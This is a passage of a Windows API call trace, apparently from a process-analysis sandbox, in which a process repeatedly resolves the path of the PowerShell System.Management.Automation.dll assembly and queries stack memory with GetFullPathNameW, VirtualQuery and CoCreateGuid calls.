lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.873] GetLastError () returned 0x0 [0052.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.873] GetLastError () returned 0x0 [0052.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e280, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.898] GetLastError () returned 0x0 [0052.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.898] GetLastError () returned 0x0 [0052.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.898] GetLastError () returned 0x0 [0052.899] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xfafd8fe9, Data2=0xd7b4, Data3=0x4209, Data4=([0]=0x9a, [1]=0xa6, [2]=0xfc, [3]=0x35, [4]=0xef, [5]=0xa3, [6]=0xae, [7]=0xb6))) returned 0x0 [0052.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.899] GetLastError () returned 0x0 [0052.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e098, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.899] GetLastError () returned 0x0 [0052.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.899] GetLastError () returned 0x0 [0052.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.899] GetLastError () returned 0x0 [0052.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.899] GetLastError () returned 0x0 [0052.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.899] GetLastError () returned 0x0 [0052.899] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.899] GetLastError () returned 0x0 [0052.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.899] GetLastError () returned 0x0 [0052.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.899] GetLastError () returned 0x0 [0052.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.899] GetLastError () returned 0x0 [0052.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de60, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.900] GetLastError () returned 0x0 [0052.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.900] GetLastError () returned 0x0 [0052.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.900] GetLastError () returned 0x0 [0052.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.900] GetLastError () returned 0x0 [0052.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.900] GetLastError () returned 0x0 [0052.900] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.900] GetLastError () returned 0x0 [0052.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.900] GetLastError () returned 0x0 [0052.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.900] GetLastError () returned 0x0 [0052.901] VirtualQuery (in: lpAddress=0x14d324, lpBuffer=0x14e324, dwLength=0x1c | out: lpBuffer=0x14e324*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.901] VirtualQuery (in: lpAddress=0x14d360, lpBuffer=0x14e360, dwLength=0x1c | out: lpBuffer=0x14e360*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e280, 
lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.902] GetLastError () returned 0x0 [0052.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.902] GetLastError () returned 0x0 [0052.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.902] GetLastError () returned 0x0 [0052.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.902] GetLastError () returned 0x0 [0052.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.902] GetLastError () returned 0x0 [0052.902] 
GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.902] GetLastError () returned 0x0 [0052.902] VirtualQuery (in: lpAddress=0x14d690, lpBuffer=0x14e690, dwLength=0x1c | out: lpBuffer=0x14e690*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.902] GetLastError () returned 0x0 [0052.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.902] GetLastError () returned 0x0 [0052.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.902] GetLastError () returned 0x0 
[0052.903] VirtualQuery (in: lpAddress=0x14d690, lpBuffer=0x14e690, dwLength=0x1c | out: lpBuffer=0x14e690*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.903] GetLastError () returned 0x0 [0052.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.903] GetLastError () returned 0x0 [0052.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.903] GetLastError () returned 0x0 [0052.903] VirtualQuery (in: lpAddress=0x14d690, lpBuffer=0x14e690, dwLength=0x1c | out: lpBuffer=0x14e690*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.903] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, 
RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.904] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.905] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.905] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.905] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.905] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.906] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.906] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.906] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, 
AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.906] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.907] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.907] VirtualQuery (in: lpAddress=0x14d4cc, lpBuffer=0x14e4cc, dwLength=0x1c | out: lpBuffer=0x14e4cc*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.908] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.909] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.909] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.909] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.909] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x347483b3, Data2=0xafac, 
Data3=0x4b55, Data4=([0]=0xb3, [1]=0x79, [2]=0xf3, [3]=0x9d, [4]=0xcc, [5]=0xb9, [6]=0x98, [7]=0xe7))) returned 0x0 [0052.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.909] GetLastError () returned 0x0 [0052.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.909] GetLastError () returned 0x0 [0052.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.909] GetLastError () returned 0x0 [0052.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.909] GetLastError () returned 0x0 [0052.910] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.910] GetLastError () returned 0x0 [0052.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.910] GetLastError () returned 0x0 [0052.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.910] GetLastError () returned 0x0 [0052.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.910] GetLastError () returned 0x0 [0052.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.910] GetLastError () returned 0x0 [0052.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.910] GetLastError () returned 0x0 [0052.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.910] GetLastError () returned 0x0 [0052.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.910] GetLastError () returned 0x0 [0052.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.910] GetLastError () returned 0x0 [0052.910] GetFullPathNameW (in: 
